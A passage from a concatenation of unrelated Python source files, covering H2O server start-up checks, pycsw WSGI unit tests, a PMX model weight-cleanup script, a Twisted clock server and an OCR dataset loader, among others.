except H2OConnectionError:
pass
# The server takes some time to shut down, so try different ports
print("Start a server with max_mem_size = 1Gb")
h2o.init(max_mem_size="1g", port=10101, strict_version_check=False)
h2o.cluster().shutdown()
print("Starting a server with min_mem_size = 314Mb")
h2o.init(min_mem_size="314M", port=20202, strict_version_check=False)
h2o.cluster().shutdown()
print("Starting a server explicitly")
# Now start a new H2O server and connect to it.
server = H2OLocalServer.start(port=str(PORT) + "+")
conn = h2o.connect(server=server)
# Get if cluster is up (True) or not (False)
cluster_up = conn.cluster.is_running()
# Check if cluster is healthy
cluster_healthy = all(node["healthy"] for node in conn.cluster.nodes)
# Logical test to see if status is healthy or not
if cluster_healthy and cluster_up:
print("Cluster is up and healthy")
elif not cluster_healthy and cluster_up:
raise ValueError("Cluster is up but not healthy")
else:
raise ValueError("Cluster is not up and is not healthy")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# [The "New BSD" license]
# Copyright (c) 2014 The Board of Trustees of The University of Alabama
# All rights reserved.
#
# See LICENSE for details.
if __name__ == '__main__':
import nose
nose.main()
from nose.tools import *
import unittest
import src
class TestExample(unittest.TestCase):
def setUp(self):
self.is_setup = True
def test_truth(self):
assert self.is_setup
@raises(AssertionError)
def test_passes_by_failing(self):
assert not self.is_setup
|
# =================================================================
#
# Authors: Ricardo Garcia Silva <ricardo.garcia.silva@gmail.com>
#
# Copyright (c) 2017 Ricardo Garcia Silva
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
"""Unit tests for pycsw.wsgi"""
from wsgiref.util import setup_testing_defaults
import mock
import pytest
from pycsw import wsgi
pytestmark = pytest.mark.unit
@pytest.mark.parametrize("process_env, wsgi_env, fake_dir, expected", [
({}, None, "dummy", "dummy"),
({"PYCSW_ROOT": "this"}, None, "dummy", "this"),
({"PYCSW_ROOT": "this"}, {"PYCSW_ROOT": "that"}, "dummy", "this"),
({}, {"PYCSW_ROOT": "that"}, "dummy", "that"),
])
def test_get_pycsw_root_path(process_env, wsgi_env, fake_dir, expected):
with mock.patch("pycsw.wsgi.os", autospec=True) as mock_os:
mock_os.path.dirname.return_value = fake_dir
result = wsgi.get_pycsw_root_path(
process_env,
request_environment=wsgi_env
)
assert result == expected
@pytest.mark.parametrize("process_env, wsgi_env, pycsw_root, expected", [
({}, {}, "dummy", "dummy/default.cfg"),
({"PYCSW_CONFIG": "default.cfg"}, {}, "dummy", "default.cfg"),
(
{"PYCSW_CONFIG": "/some/abs/path/default.cfg"},
{},
"dummy",
"/some/abs/path/default.cfg"
),
(
{"PYCSW_CONFIG": "default.cfg"},
{"QUERY_STRING": ""},
"dummy",
"default.cfg"
),
(
{"PYCSW_CONFIG": "default.cfg"},
{"QUERY_STRING": "config=other.cfg"},
"dummy",
"other.cfg"
),
(
{"PYCSW_CONFIG": "default.cfg"},
{"QUERY_STRING": "config=/other/path/other.cfg"},
"dummy",
"/other/path/other.cfg"
),
])
def test_get_configuration_path(process_env, wsgi_env, pycsw_root, expected):
result = wsgi.get_configuration_path(process_env, wsgi_env, pycsw_root)
assert result == expected
@pytest.mark.parametrize("compression_level", [
1, 2, 3, 4, 5, 6, 7, 8, 9,
])
def test_compress_response(compression_level):
fake_response = "dummy"
with mock.patch("pycsw.wsgi.gzip", autospec=True) as mock_gzip:
compressed_response, headers = wsgi.compress_response(
fake_response, compression_level)
creation_kwargs = mock_gzip.GzipFile.call_args[1]
assert creation_kwargs["compresslevel"] == compression_level
assert headers["Content-Encoding"] == "gzip"
def test_application_no_gzip():
fake_config_path = "fake_config_path"
fake_status = "fake_status"
fake_response = "fake_response"
fake_content_type = "fake_content_type"
request_env = {}
setup_testing_defaults(request_env)
mock_start_response = mock.MagicMock()
with mock.patch("pycsw.wsgi.server", autospec=True) as mock_server, \
mock.patch.object(
wsgi, "get_configuration_path") as mock_get_config_path:
mock_get_config_path.return_value = fake_config_path
mock_csw_class = mock_server.Csw
mock_pycsw = mock_csw_class.return_value
mock_pycsw.dispatch_wsgi.return_value = (fake_status, fake_response)
mock_pycsw.contenttype = fake_content_type
result = wsgi.application(request_env, mock_start_response)
mock_csw_class.assert_called_with(fake_config_path, request_env)
start_response_args = mock_start_response.call_args[0]
assert fake_status in start_response_args
assert result == [fake_response]
def test_application_gzip():
fake_config_path = "fake_config_path"
fake_status = "fake_status"
fake_response = "fake_response"
fake_content_type = "fake_content_type"
fake_compression_level = 5
fake_compressed_contents = "fake compressed contents"
fake_compression_headers = {"phony": "dummy"}
request_env = {"HTTP_ACCEPT_ENCODING": "gzip"}
setup_testing_defaults(request_env)
mock_start_response = mock.MagicMock()
with mock.patch("pycsw.wsgi.server", autospec=True) as mock_server, \
mock.patch.object(
wsgi, "get_configuration_path") as mock_get_config_path, \
mock.patch.object(wsgi, "compress_response") as mock_compress:
mock_compress.return_value = (fake_compressed_contents,
fake_compression_headers)
mock_get_config_path.return_value = fake_config_path
mock_csw_class = mock_server.Csw
mock_pycsw = mock_csw_class.return_value
mock_pycsw.config = mock.MagicMock()
mock_pycsw.config.get.return_value = fake_compression_level
mock_pycsw.dispatch_wsgi.return_value = (fake_status, fake_response)
mock_pycsw.contenttype = fake_content_type
wsgi.application(request_env, mock_start_response)
mock_pycsw.config.get.assert_called_with("server",
"gzip_compresslevel")
mock_compress.assert_called_with(fake_response, fake_compression_level)
|
# -*- coding: utf-8 -*-
from openprocurement.api.utils import json_view
from openprocurement.tender.core.utils import optendersresource
from openprocurement.tender.core.validation import (
validate_patch_contract_data,
validate_update_contract_value,
validate_update_contract_only_for_active_lots,
validate_contract_operation_not_in_allowed_status,
validate_update_contract_value_with_award,
validate_update_contract_value_amount,
validate_update_contract_value_net_required,
validate_update_contract_status_by_supplier,
validate_activate_contract,
validate_update_contract_status,
)
from openprocurement.tender.belowthreshold.views.contract import (
TenderAwardContractResource,
)
from openprocurement.tender.cfaselectionua.utils import check_tender_status
@optendersresource(
name="closeFrameworkAgreementSelectionUA:Tender Contracts",
collection_path="/tenders/{tender_id}/contracts",
path="/tenders/{tender_id}/contracts/{contract_id}",
procurementMethodType="closeFrameworkAgreementSelectionUA",
description="Tender contracts",
)
class TenderAwardContractResource(TenderAwardContractResource):
@staticmethod
def check_tender_status_method(request):
return check_tender_status(request)
@json_view(
content_type="application/json",
permission="edit_contract",
validators=(
validate_patch_contract_data,
validate_contract_operation_not_in_allowed_status,
validate_update_contract_status_by_supplier,
validate_update_contract_status,
validate_update_contract_only_for_active_lots,
validate_update_contract_value,
validate_update_contract_value_net_required,
validate_update_contract_value_with_award,
validate_update_contract_value_amount,
),
)
def patch(self):
return super(TenderAwardContractResource, self).patch()
|
from model.group import Group
import random
def test_edit_group_name(app, db):
if app.group.count() == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group = Group(name="new name")
app.group.edit_group_by_id(group.id, new_group)
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
def test_edit_group_header(app, db):
if app.group.count() == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group = Group(header="new header")
app.group.edit_group_by_id(group.id, new_group)
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
def test_edit_group_footer(app, db):
if app.group.count() == 0:
app.group.create(Group(name="test"))
old_groups = db.get_group_list()
group = random.choice(old_groups)
new_group = Group(footer="new footer")
app.group.edit_group_by_id(group.id, new_group)
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
|
from egat.testset import SequentialTestSet
from egat.testset import UnorderedTestSet
from selenium import webdriver
# In the SequentialTestSet, the setup and teardown methods will be called before any
# tests are executed and after all tests are finished, respectively. If you run
# these tests you will see that the browser only launches once.
#
# This is a special behavior which is built into the TestRunner, so 'setup' and
# 'teardown' are reserved keywords when working with the TestSet class.
class TestSetupAndTeardown1(SequentialTestSet):
def setup(self):
self.browser = webdriver.Firefox()
def testDuck(self):
self.browser.get("http://duckduckgo.com")
def testGoogle(self):
self.browser.get("http://google.com")
def testBing(self):
self.browser.get("http://bing.com")
assert(False)
def testYahoo(self):
self.browser.get("http://yahoo.com")
def teardown(self):
self.browser.quit()
# In the UnorderedTestSet, the setup and teardown methods will be called before each
# test method and after each test method , respectively. If you run these tests you
# will see the browser launch before each test and quit after each test.
class TestSetupAndTeardown2(UnorderedTestSet):
def setup(self):
self.browser = webdriver.Firefox()
def testDuck(self):
self.browser.get("http://duckduckgo.com")
def testGoogle(self):
self.browser.get("http://google.com")
def testBing(self):
self.browser.get("http://bing.com")
assert(False)
def testYahoo(self):
self.browser.get("http://yahoo.com")
def teardown(self):
self.browser.quit()
|
# Nuthouse01 - 08/24/2020 - v5.00
# This code is free to use and re-distribute, but I cannot be held responsible for damages that it may or may not cause.
#####################
# first, system imports
from typing import List, Tuple
# second, wrap custom imports with a try-except to catch it if files are missing
try:
from . import nuthouse01_core as core
from . import nuthouse01_pmx_parser as pmxlib
from . import nuthouse01_pmx_struct as pmxstruct
except ImportError as eee:
try:
import nuthouse01_core as core
import nuthouse01_pmx_parser as pmxlib
import nuthouse01_pmx_struct as pmxstruct
except ImportError as eee:
print(eee.__class__.__name__, eee)
print("ERROR: failed to import some of the necessary files, all my scripts must be together in the same folder!")
print("...press ENTER to exit...")
input()
exit()
core = pmxlib = pmxstruct = None
# when debug=True, disable the catchall try-except block. this means the full stack trace gets printed when it crashes,
# but if launched in a new window it exits immediately so you can't read it.
DEBUG = False
helptext = '''====================
weight_cleanup:
This function will fix the vertex weights that are weighted twice to the same bone, a minor issue that sometimes happens when merging bones.
This also normalizes the weights of all vertices, and normalizes the normal vectors for all vertices.
'''
iotext = '''Inputs: PMX file "[model].pmx"\nOutputs: PMX file "[model]_weightfix.pmx"
'''
def showhelp():
# print info to explain the purpose of this file
core.MY_PRINT_FUNC(helptext)
def showprompt():
# print info to explain what inputs/outputs it needs/creates
core.MY_PRINT_FUNC(iotext)
# prompt PMX name
core.MY_PRINT_FUNC("Please enter name of PMX model file:")
input_filename_pmx = core.prompt_user_filename(".pmx")
pmx = pmxlib.read_pmx(input_filename_pmx, moreinfo=True)
return pmx, input_filename_pmx
def normalize_weights(pmx: pmxstruct.Pmx) -> int:
"""
Normalize weights for verts in the PMX object. Also "clean" the weights by removing bones with 0 weight, reducing
weight type to lowest possible, and sorting them by greatest weight. Return the # of vertices that were modified.
:param pmx: PMX object
:return: int, # of vertices that were modified
"""
# number of vertices fixed
weight_fix = 0
# for each vertex:
for d, vert in enumerate(pmx.verts):
# clean/normalize the weights
weighttype = vert.weighttype
w = vert.weight
# type0=BDEF1, one bone has 100% weight
# do nothing
# type1=BDEF2, 2 bones 1 weight (other is implicit)
# merge, see if it can reduce to BDEF1
# type2=BDEF4, 4 bones 4 weights
# normalize, merge, see if it can reduce to BDEF1/2
# type3=SDEF, 2 bones 1 weight and 12 values i don't understand.
# nothing
# type4=QDEF, 4 bones 4 weights
# normalize, merge
if weighttype == 0: # BDEF1
# nothing to be fixed here
continue
elif weighttype == 1: # BDEF2
# no need to normalize because the 2nd weight is implicit, not explicit
# only merge dupes, look for reason to reduce to BDEF1: bones are same, weight is 0/1
if w[0] == w[1] or w[2] == 1: # same bones handled the same way as firstbone with weight 1
weight_fix += 1
vert.weighttype = 0 # set to BDEF1
vert.weight = [w[0]]
elif w[2] == 0: # firstbone has weight 0
weight_fix += 1
vert.weighttype = 0 # set to BDEF1
vert.weight = [w[1]]
continue
elif weighttype == 2 or weighttype == 4: # BDEF4/QDEF
# qdef: check for dupes and also normalize
bones = w[0:4]
weights = w[4:8]
is_modified = False
# unify dupes
usedbones = []
for i in range(4):
if not (bones[i] == 0 and weights[i] == 0.0) and (bones[i] in usedbones):
is_modified = True # then this is a duplicate bone!
where = usedbones.index(bones[i]) # find index where it was first used
weights[where] += weights[i] # combine this bone's weight with the first place it was used
bones[i] = 0 # set this bone to null
weights[i] = 0.0 # set this weight to 0
# add to list of usedbones regardless of whether first or dupe
usedbones.append(bones[i])
# sort by greatest weight
before = tuple(bones)
together = list(zip(bones, weights)) # zip
together.sort(reverse=True, key=lambda x: x[1]) # sort
a, b = zip(*together) # unzip
if hash(before) != hash(a): # did the order change?
is_modified = True
bones = list(a)
weights = list(b)
# normalize if needed
s = sum(weights)
if round(s, 6) != 1.0:
if s == 0:
core.MY_PRINT_FUNC("Error: vert %d has BDEF4 weights that sum to 0, cannot normalize" % d)
continue
# it needs it, do it
weights = [t / s for t in weights]
is_modified = True
try:
# where is the first 0 in the weight list? i know it is sorted descending
i = weights.index(0)
if i == 1: # first zero at 1, therefore has 1 entry, therefore force to be BDEF1!
weight_fix += 1
vert.weighttype = 0 # set to BDEF1
vert.weight = [bones[0]]
continue
if weighttype == 2: # BDEF4 ONLY: check if it can be reduced to BDEF2
if i == 2: # first zero at 2, therefore has 2 nonzero entries, therefore force to be BDEF2!
weight_fix += 1
vert.weighttype = 1 # set to BDEF2
vert.weight = [bones[0], bones[1], weights[0]]
continue
# if i == 3, fall thru
except ValueError:
pass # if '0' not found in list, it is using all 4, fall thru
# is QDEF, or was BDEF and determined to still be BDEF4
# type stays the same, but have i changed the values? if so store and increment
if is_modified:
w[0:4] = bones
w[4:8] = weights
weight_fix += 1
elif weighttype == 3: # SDEF
# the order of the bones makes a very very slight difference, so dont try to reorder them
# do try to compress to BDEF1 if the bones are the same or if one has 100 or 0 weight
if w[0] == w[1] or w[2] == 1: # same bones handled the same way as firstbone with weight 1
weight_fix += 1
vert.weighttype = 0 # set to BDEF1
vert.weight = [w[0]]
elif w[2] == 0: # firstbone has weight 0
weight_fix += 1
vert.weighttype = 0 # set to BDEF1
vert.weight = [w[1]]
continue
else:
core.MY_PRINT_FUNC("ERROR: invalid weight type for vertex %d" % d)
pass # close the for-each-vert loop
# how many did I change? printing is handled outside
return weight_fix
def normalize_normals(pmx: pmxstruct.Pmx) -> Tuple[int,List[int]]:
"""
Normalize normal vectors for each vertex in the PMX object. Return # of verts that were modified, and also a list
of all vert indexes that have 0,0,0 normals and need special handling.
:param pmx: PMX list-of-lists object
:return: # verts modified + list of all vert idxs that have 0,0,0 normals
"""
norm_fix = 0
normbad = []
for d,vert in enumerate(pmx.verts):
# normalize the normal
if vert.norm == [0, 0, 0]:
# invalid normals will be taken care of below
normbad.append(d)
else:
norm_L = core.my_euclidian_distance(vert.norm)
if round(norm_L, 6) != 1.0:
norm_fix += 1
vert.norm = [n / norm_L for n in vert.norm]
# printing is handled outside
return norm_fix, normbad
def repair_invalid_normals(pmx: pmxstruct.Pmx, normbad: List[int]) -> int:
"""
Repair all 0,0,0 normals in the model by averaging the normal vector for each face that vertex is a member of.
It is theoretically possible for a vertex to be a member in two faces with exactly opposite normals, and therefore
the average would be zero; in this case one of the faces is arbitrarily chosen and its normal is used. Therefore,
after this function all invalid normals are guaranteed to be fixed.
Returns the number of times this fallback method was used.
:param pmx: PMX list-of-lists object
:param normbad: list of vertex indices so I don't need to walk all vertices again
:return: # times fallback method was used
"""
normbad_err = 0
# create a list in parallel with the faces list for holding the perpendicular normal to each face
facenorm_list = [list() for i in pmx.faces]
# create a list in paralle with normbad for holding the set of faces connected to each bad-norm vert
normbad_linked_faces = [list() for i in normbad]
# goal: build the sets of faces that are associated with each bad vertex
# first, flatten the list of face-vertices, probably faster to search that way
flatlist = [item for sublist in pmx.faces for item in sublist]
# second, for each face-vertex, check if it is a bad vertex
# (this takes 70% of time)
for d, facevert in enumerate(flatlist):
core.print_progress_oneline(.7 * d / len(flatlist))
# bad vertices are unique and in sorted order, can use binary search to further optimize
whereinlist = core.binary_search_wherein(facevert, normbad)
if whereinlist != -1:
# if it is a bad vertex, int div by 3 to get face ID
(normbad_linked_faces[whereinlist]).append(d // 3)
# for each bad vert:
# (this takes 30% of time)
for d, (badvert_idx, badvert_faces) in enumerate(zip(normbad, normbad_linked_faces)):
newnorm = [0, 0, 0] # default value in case something goes wrong
core.print_progress_oneline(.7 + (.3 * d / len(normbad)))
# iterate over the faces it is connected to
for face_id in badvert_faces:
# for each face, does the perpendicular normal already exist in the parallel list? if not, calculate and save it for reuse
facenorm = facenorm_list[face_id]
if not facenorm:
# need to calculate it! use cross product or whatever
# q,r,s order of vertices is important!
q = pmx.verts[ pmx.faces[face_id][0] ].pos
r = pmx.verts[ pmx.faces[face_id][1] ].pos
s = pmx.verts[ pmx.faces[face_id][2] ].pos
# qr, qs order of vertices is critically important!
qr = [r[i] - q[i] for i in range(3)]
qs = [s[i] - q[i] for i in range(3)]
facenorm = core.my_cross_product(qr, qs)
# then normalize the fresh normal
norm_L = core.my_euclidian_distance(facenorm)
try:
facenorm = [n / norm_L for n in facenorm]
except ZeroDivisionError:
# this should never happen in normal cases
# however it can happen when the verts are at the same position and therefore their face has zero surface area
facenorm = [0, 1, 0]
# then save the result so I don't have to do this again
facenorm_list[face_id] = facenorm
# once I have the perpendicular normal for this face, then accumulate it (will divide later to get avg)
for i in range(3):
newnorm[i] += facenorm[i]
# error case check, theoretically possible for this to happen if there are no connected faces or their normals exactly cancel out
if newnorm == [0, 0, 0]:
if len(badvert_faces) == 0:
# if there are no connected faces, set the normal to 0,1,0 (same handling as PMXE)
pmx.verts[badvert_idx].norm = [0, 1, 0]
else:
# if there are faces that just so happened to perfectly cancel, choose the first face and use its normal
pmx.verts[badvert_idx].norm = facenorm_list[badvert_faces[0]]
normbad_err += 1
continue
# when done accumulating, divide by # to make an average
# zerodiv err not possible: if there are no connected faces then it will hit [0,0,0] branch above
newnorm = [n / len(badvert_faces) for n in newnorm]
# then normalize this, again
norm_L = core.my_euclidian_distance(newnorm)
newnorm = [n / norm_L for n in newnorm]
# finally, apply this new normal
pmx.verts[badvert_idx].norm = newnorm
return normbad_err
# TODO: rename this script & this function
def weight_cleanup(pmx: pmxstruct.Pmx, moreinfo=False):
#############################
# part 1: fix all the weights, get an answer for how many i changed
weight_fix = normalize_weights(pmx)
if weight_fix:
core.MY_PRINT_FUNC("Fixed weights for {} / {} = {:.1%} of all vertices".format(
weight_fix, len(pmx.verts), weight_fix/len(pmx.verts)))
#############################
# part 2: normalize all normals that aren't invalid, also count how many are invalid
# also build 'normbad' to identify all verts w/ 0,0,0 normals so I can get a progress % in following step
norm_fix, normbad = normalize_normals(pmx)
if norm_fix:
core.MY_PRINT_FUNC("Normalized normals for {} / {} = {:.1%} of all vertices".format(
norm_fix, len(pmx.verts), norm_fix / len(pmx.verts)))
#############################
# part 3: normalize all the normals that were invalid
if normbad:
normbad_err = repair_invalid_normals(pmx, normbad)
core.MY_PRINT_FUNC("Repaired invalid normals for {} / {} = {:.1%} of all vertices".format(
len(normbad), len(pmx.verts), len(normbad) / len(pmx.verts)))
if normbad_err and moreinfo:
core.MY_PRINT_FUNC("WARNING: used fallback vertex repair method for %d vertices" % normbad_err)
if weight_fix == 0 and norm_fix == 0 and len(normbad) == 0:
core.MY_PRINT_FUNC("No changes are required")
return pmx, False
return pmx, True
def end(pmx, input_filename_pmx):
# write out
# output_filename_pmx = "%s_weightfix.pmx" % core.get_clean_basename(input_filename_pmx)
output_filename_pmx = input_filename_pmx[0:-4] + "_weightfix.pmx"
output_filename_pmx = core.get_unused_file_name(output_filename_pmx)
pmxlib.write_pmx(output_filename_pmx, pmx, moreinfo=True)
return None
def main():
showhelp()
pmx, name = showprompt()
pmx, is_changed = weight_cleanup(pmx)
if is_changed:
end(pmx, name)
core.pause_and_quit("Done with everything! Goodbye!")
if __name__ == '__main__':
core.MY_PRINT_FUNC("Nuthouse01 - 08/24/2020 - v5.00")
if DEBUG:
main()
else:
try:
main()
except (KeyboardInterrupt, SystemExit):
# this is normal and expected, do nothing and die normally
pass
except Exception as ee:
# if an unexpected error occurs, catch it and print it and call pause_and_quit so the window stays open for a bit
core.MY_PRINT_FUNC(ee)
core.pause_and_quit("ERROR: something truly strange and unexpected has occurred, sorry, good luck figuring out what tho")
|
from finbot.providers.errors import RetiredProviderError
from typing import Any, Type, TypeVar, TypedDict, Optional
class Account(TypedDict):
id: str
name: str
iso_currency: str
type: str
class BalanceEntry(TypedDict):
account: Account
balance: float
class Balances(TypedDict):
accounts: list[BalanceEntry]
class Asset(TypedDict, total=False):
name: str
type: str
value: float
units: Optional[float]
provider_specific: Optional[dict[str, Any]]
class AssetEntry(TypedDict):
account: Account
assets: list[Asset]
class Assets(TypedDict):
accounts: list[AssetEntry]
class LiabilityDescription(TypedDict):
name: str
type: str
value: float
class LiabilityEntry(TypedDict):
account: Account
liabilities: list[LiabilityDescription]
class Liabilities(TypedDict):
accounts: list[LiabilityEntry]
class Base(object):
def __init__(self, **kwargs: Any):
pass
def authenticate(self, credentials: Any) -> None:
"""Authenticate user with provided credentials. Should persist any
information needed to perform further operations (get balances,
get assets, get liabilities)
:raises AuthFailure: should be raised if authentication failed
"""
pass
def get_balances(self) -> Balances:
""" """
return {"accounts": []}
def get_assets(self) -> Assets:
""" """
return {"accounts": []}
def get_liabilities(self) -> Liabilities:
""" """
return {"accounts": []}
def close(self) -> None:
"""Implement to release any used resource at the end of the session"""
pass
T = TypeVar("T")
def retired(cls: Type[T]) -> Type[T]:
def init_override(*args: Any, **kwargs: Any) -> None:
raise RetiredProviderError()
cls.__init__ = init_override # type: ignore
return cls
|
"""Module defining classes and functions related to website accounts.
Uses Google Python Style Guide: https://google.github.io/styleguide/pyguide.html
"""
class Account:
"""Represents a website account.
Attributes:
password: A string containing the password of the user's account.
username: An (optional) string containing the username of the
user's account.
email: An (optional) string containing the email of the user's
account.
"""
def __init__(self, password, username = None, email = None):
"""Initializes Account class with password and, optionally,
username and email.
"""
self.password = password
self.username = email
self.email = email
|
from pathlib import Path
from setuptools import setup, find_packages
setup(
name="metovhooks",
version="0.1.8",
description="My personal git hooks.",
url="https://github.com/metov/metovhooks",
long_description=Path("README.md").read_text(),
long_description_content_type="text/markdown",
author="Azat Akhmetov",
author_email="azatinfo@yandex.com",
classifiers=[
"Programming Language :: Python :: 3",
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
],
packages=find_packages(),
install_requires=[
"coloredlogs",
"docopt",
"GitPython",
"packaging",
"pre_commit_hooks",
"toml",
],
entry_points={
"console_scripts": [
"require_version_bump = metovhooks.require_version_bump:main",
"protect_branch = metovhooks.protect_branch:main",
]
},
)
|
class Solution:
def subsets(self, nums: List[int]) -> List[List[int]]:
ret = []
n = len(nums)
for i in range(2 ** n):
tmp = []
idx = 0
while i:
if i & 1:
tmp.append(nums[idx])
i >>= 1
idx += 1
ret.append(tmp)
return ret
|
from arm.logicnode.arm_nodes import *
class StringNode(ArmLogicTreeNode):
"""Stores a string as a variable."""
bl_idname = 'LNStringNode'
bl_label = 'String'
arm_version = 1
def init(self, context):
super(StringNode, self).init(context)
self.add_input('NodeSocketString', 'String In')
self.add_output('NodeSocketString', 'String Out', is_var=True)
add_node(StringNode, category=PKG_AS_CATEGORY)
|
import psutil
nome = input("Entre com o nome do processo a ser buscado: ")
ip = psutil.pids()
lista_pid = []
for i in ip:
p = psutil.Process(i)
if p.name() == nome:
lista_pid.append(str(i))
if len(lista_pid) > 0:
print(f"O(s) PID(s) de {nome} são:")
print(','.join(lista_pid))
else:
print(nome,"não está executando no momento.") |
# Written in Python 2
from __future__ import division
from PIL import Image
im = Image.open( './images/256x256bb.jpg')
matrixWidth = 30
matrixHeight = 22
imgWidth = im.width
imgHeight = im.height
print "imgSize", imgWidth, " x ", imgHeight
wBuffer = round(imgWidth/matrixWidth)
hBuffer = round(imgHeight/matrixHeight)
print "wBuffer:", wBuffer
print "hBuffer:", hBuffer
pixVals = []
xcounter = 0
ycounter = 0
y = 0
while y < imgHeight:
x = 0
xcounter = 0
while x < imgWidth:
r,g,b = im.getpixel((x,y))
pixVals.append(r<<16 | g<<8 | b)
x += wBuffer
xcounter += 1
y += hBuffer
ycounter += 1
print "x counter: ", xcounter
print "y counter: ", ycounter
print "length: ", len(pixVals)
print(pixVals)
mapFile = open('mapping.h', 'w')
mapFile.write("#if defined(__AVR__)\n")
mapFile.write("#include <avr/pgmspace.h>\n")
mapFile.write("#elif defined(__PIC32MX__)\n")
mapFile.write("#define PROGMEM\n")
mapFile.write("#elif defined(__arm__)\n")
mapFile.write("#define PROGMEM\n")
mapFile.write("#endif\n")
mapFile.write("const unsigned short bitmap24["+str(len(pixVals))+"] PROGMEM={\n")
for val in pixVals:
mapFile.write(str(val) + ", ")
mapFile.write("\n")
mapFile.write("};\n")
|
from twisted.internet import reactor
from twisted.web.resource import Resource
from twisted.web.server import Site
import time
class ClockPage(Resource):
isLeaf = True
def render_GET(self, request):
return "The local time is %s" % (time.ctime(),)
resource = ClockPage()
factory = Site(resource)
reactor.listenTCP(8000, factory)
reactor.run()
|
import pickle
import math
import torch
import re
from tqdm import tqdm
from PIL import Image
from pathlib import Path
from torch.utils.data import Dataset
from torchvision import transforms
class DatasetSYNTH(Dataset):
def __init__(self, cfg):
self.cfg = cfg
with open(cfg.data_path, 'rb') as f:
data = pickle.load(f)
self.imagePath = Path(cfg.data_path).parent
self.imnames, self.txt = [], []
for fn, label in data:
if len(label) <= cfg.dtr.max_seq_len:
self.imnames.append(fn)
self.txt.append(label)
else:
print(f'label of {fn} is longer than max_seq_len')
self.tokens = set()
for txt in self.txt:
if not cfg.dtr.is_character:
txt = txt.split(' ')
for token in txt:
self.tokens.add(token)
self.tokens = list(self.tokens)
with open('vocab.txt', 'w', encoding='utf8') as f:
f.write(' '.join(self.tokens))
def __len__(self):
return len(self.imnames)
def __getitem__(self, item):
item = item % len(self.imnames)
image = Image.open(self.imagePath / self.imnames[item]) # Read the image
image = image.convert('L' if self.cfg.dtr.input_channel==1 else 'RGB')
txt = self.txt[item]
return image, txt
class AlignCollate(object):
def __init__(self, cfg):
self.cfg = cfg.dtr
self.imgH = self.cfg.imgH
self.imgW = self.cfg.imgW
self.keep_ratio_with_pad = self.cfg.PAD
def __call__(self, batch):
images, labels = zip(*batch)
if self.keep_ratio_with_pad: # same concept with 'Rosetta' paper
resized_max_w = self.imgW
transform = NormalizePAD((self.cfg.input_channel, self.imgH, resized_max_w))
resized_images = []
for image in images:
w, h = image.size
ratio = w / float(h)
if math.ceil(self.imgH * ratio) > self.imgW:
resized_w = self.imgW
else:
resized_w = math.ceil(self.imgH * ratio)
resized_image = image.resize((resized_w, self.imgH), Image.BICUBIC)
resized_images.append(transform(resized_image))
image_tensors = torch.cat([t.unsqueeze(0) for t in resized_images], 0)
else:
transform = ResizeNormalize((self.imgW, self.imgH))
image_tensors = [transform(image) for image in images]
image_tensors = torch.cat([t.unsqueeze(0) for t in image_tensors], 0)
return image_tensors, labels
class ResizeNormalize(object):
def __init__(self, size, interpolation=Image.BICUBIC):
self.size = size
self.interpolation = interpolation
self.toTensor = transforms.ToTensor()
def __call__(self, img):
img = img.resize(self.size, self.interpolation)
img = self.toTensor(img)
img.sub_(0.5).div_(0.5) # -1.0 ~ 1.0
return img
class NormalizePAD(object):
def __init__(self, max_size, PAD_type='right'):
self.toTensor = transforms.ToTensor()
self.max_size = max_size
self.max_width_half = math.floor(max_size[2] / 2)
self.PAD_type = PAD_type
def __call__(self, img):
img = self.toTensor(img)
img.sub_(0.5).div_(0.5)
c, h, w = img.size()
Pad_img = torch.FloatTensor(*self.max_size).fill_(0)
Pad_img[:, :, :w] = img # right pad
if self.max_size[2] != w: # add border Pad
Pad_img[:, :, w:] = img[:, :, w - 1].unsqueeze(2).expand(c, h, self.max_size[2] - w)
return Pad_img
|
import datetime
import jcudc24ingesterapi
import os.path
import unittest
from jcudc24ingesterapi.models.dataset import Dataset
from jcudc24ingesterapi.models.locations import Location, Region, LocationOffset
from jcudc24ingesterapi.schemas.data_types import FileDataType, Double, String, DateTime
from jcudc24ingesterapi.models.data_sources import PullDataSource, PushDataSource
from jcudc24ingesterapi.models.data_entry import DataEntry, FileObject
from jcudc24ingesterapi.ingester_platform_api import IngesterPlatformAPI, Marshaller,\
UnitOfWork
from jcudc24ingesterapi.authentication import CredentialsAuthentication
from jcudc24ingesterapi.models.metadata import DatasetMetadataEntry, DataEntryMetadataEntry
from jcudc24ingesterapi.schemas.metadata_schemas import DataEntryMetadataSchema, DatasetMetadataSchema
from jcudc24ingesterapi.models.sampling import PeriodicSampling #, CustomSampling, RepeatSampling
from jcudc24ingesterapi.ingester_exceptions import UnsupportedSchemaError, InvalidObjectError, UnknownObjectError, AuthenticationError,\
StaleObjectError
from jcudc24ingesterapi.schemas.data_entry_schemas import DataEntrySchema
from jcudc24ingesterapi.search import DataEntrySearchCriteria,\
DatasetMetadataSearchCriteria, LocationSearchCriteria, DatasetSearchCriteria,\
DataEntrySchemaSearchCriteria, DataEntryMetadataSearchCriteria
class SchemaTest(unittest.TestCase):
"""
This test defines and checks that the Ingester API works the way the provisioning interface expects.
"""
def setUp(self):
